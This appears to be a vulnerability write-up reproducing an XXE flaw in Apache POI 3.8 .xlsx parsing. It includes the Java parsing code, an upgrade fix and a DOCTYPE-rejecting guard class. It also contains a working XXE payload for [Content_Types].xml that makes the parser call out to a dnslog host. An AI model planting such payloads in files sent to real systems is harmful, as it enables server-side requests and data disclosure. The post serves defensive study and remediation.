Reproducing the XXE vulnerability in org.apache.poi 3.8 Excel parsing
Reproduction steps
Add the dependencies to pom.xml:
<dependency>
    <groupId>org.apache.poi</groupId>
    <artifactId>poi</artifactId>
    <version>3.8</version>
</dependency>
<dependency>
    <groupId>org.apache.poi</groupId>
    <artifactId>poi-ooxml</artifactId>
    <version>3.8</version>
</dependency>
Key code:
import java.io.FileInputStream;
import java.io.IOException;
import org.apache.poi.xssf.usermodel.XSSFCell;
import org.apache.poi.xssf.usermodel.XSSFRow;
import org.apache.poi.xssf.usermodel.XSSFSheet;
import org.apache.poi.xssf.usermodel.XSSFWorkbook;

public String readExcelData(String path, String sheetName) throws IOException {
    StringBuilder cell = new StringBuilder();
    // The untrusted .xlsx is parsed here; POI 3.8 resolves external entities
    // declared in the package's XML parts, which is what the DOCTYPE below abuses.
    try (FileInputStream fileInputStream = new FileInputStream(path)) {
        XSSFWorkbook sheets = new XSSFWorkbook(fileInputStream);
        // get the sheet
        XSSFSheet sheet = sheets.getSheet(sheetName);
        if (sheet == null) {
            return "";
        }
        // number of rows
        int rows = sheet.getPhysicalNumberOfRows();
        for (int i = 0; i < rows; i++) {
            XSSFRow row = sheet.getRow(i);
            if (row == null) {
                continue; // rows with no cells come back as null
            }
            // number of columns
            int columns = row.getPhysicalNumberOfCells();
            for (int j = 0; j < columns; j++) {
                XSSFCell c = row.getCell(j);
                cell.append(c == null ? "" : c.toString()).append("<br/>");
            }
        }
    }
    return cell.toString();
}
Unzip xxe.xlsx, edit [Content_Types].xml, and insert on the second line:
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://dnslog/test.dtd"> ]> <x>&xxe;</x>
Opening the file through the code above then triggers the dnslog callback.
Solution:
Upgrade POI to version 4.0.1 or later.
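Upgrading POI is the real fix. For services that must keep accepting .xlsx uploads while the upgrade rolls out, a belt-and-braces check is to refuse any OOXML package whose XML parts carry a DOCTYPE declaration before the file ever reaches XSSFWorkbook: well-formed Office files never need one, and it is the only place an external entity can be declared. The guard below is an added example written for this post, not code from the post or from Apache POI; the class name OoxmlDoctypeGuard and the 10 MB per-part limit are assumptions.

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Enumeration;
import java.util.List;
import java.util.regex.Pattern;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

/**
 * Pre-parse guard for OOXML (.xlsx/.docx/.pptx) uploads.
 * Hypothetical helper, not part of POI: it rejects any package whose XML parts
 * carry a DOCTYPE, since that is the only way an external entity can be declared.
 */
public final class OoxmlDoctypeGuard {

    // Matches "<!DOCTYPE" case-insensitively, tolerating whitespace after "<!"
    private static final Pattern DOCTYPE = Pattern.compile("<!\\s*DOCTYPE", Pattern.CASE_INSENSITIVE);
    // Assumed upper bound for a single XML part; larger parts are refused, not scanned
    private static final int MAX_PART_BYTES = 10 * 1024 * 1024;

    private OoxmlDoctypeGuard() {}

    /** Returns the names of all XML parts that declare a DOCTYPE; an empty list means safe to hand to POI. */
    public static List<String> findDoctypeParts(ZipFile zip) throws IOException {
        List<String> offending = new ArrayList<>();
        Enumeration<? extends ZipEntry> entries = zip.entries();
        while (entries.hasMoreElements()) {
            ZipEntry entry = entries.nextElement();
            String name = entry.getName();
            // Only XML-based parts matter: [Content_Types].xml, *.xml and *.rels
            if (entry.isDirectory() || !(name.endsWith(".xml") || name.endsWith(".rels"))) {
                continue;
            }
            try (InputStream in = zip.getInputStream(entry)) {
                // Read one byte past the limit so a lying zip header cannot bypass the bound
                byte[] raw = in.readNBytes(MAX_PART_BYTES + 1);
                if (raw.length > MAX_PART_BYTES) {
                    offending.add(name + " (oversized)");
                    continue;
                }
                if (DOCTYPE.matcher(decode(raw)).find()) {
                    offending.add(name);
                }
            }
        }
        return offending;
    }

    /** Honour a UTF-16 BOM so a re-encoded part cannot hide the DOCTYPE from a UTF-8 scan. */
    private static String decode(byte[] raw) {
        Charset cs = StandardCharsets.UTF_8;
        if (raw.length >= 2) {
            int b0 = raw[0] & 0xFF, b1 = raw[1] & 0xFF;
            if (b0 == 0xFE && b1 == 0xFF) cs = StandardCharsets.UTF_16BE;
            else if (b0 == 0xFF && b1 == 0xFE) cs = StandardCharsets.UTF_16LE;
        }
        return new String(raw, cs);
    }

    /** Throws before the file reaches XSSFWorkbook if any part carries a DOCTYPE. */
    public static void assertNoDoctype(String path) throws IOException {
        try (ZipFile zip = new ZipFile(path)) {
            List<String> bad = findDoctypeParts(zip);
            if (!bad.isEmpty()) {
                throw new IOException("Rejected OOXML package: DOCTYPE found in " + bad);
            }
        }
    }

    public static void main(String[] args) throws IOException {
        // Usage: java OoxmlDoctypeGuard upload.xlsx
        assertNoDoctype(args[0]);
        System.out.println("No DOCTYPE in any XML part; safe to parse");
    }
}
```

Call assertNoDoctype(path) before new XSSFWorkbook(...). A rejected upload is worth logging with the offending part name, because a DOCTYPE in [Content_Types].xml or a .rels part is a strong signal of an attempted XXE rather than a corrupt file. The check only covers entity injection through the package's XML parts; it does not replace the upgrade, which fixes the parser configuration itself.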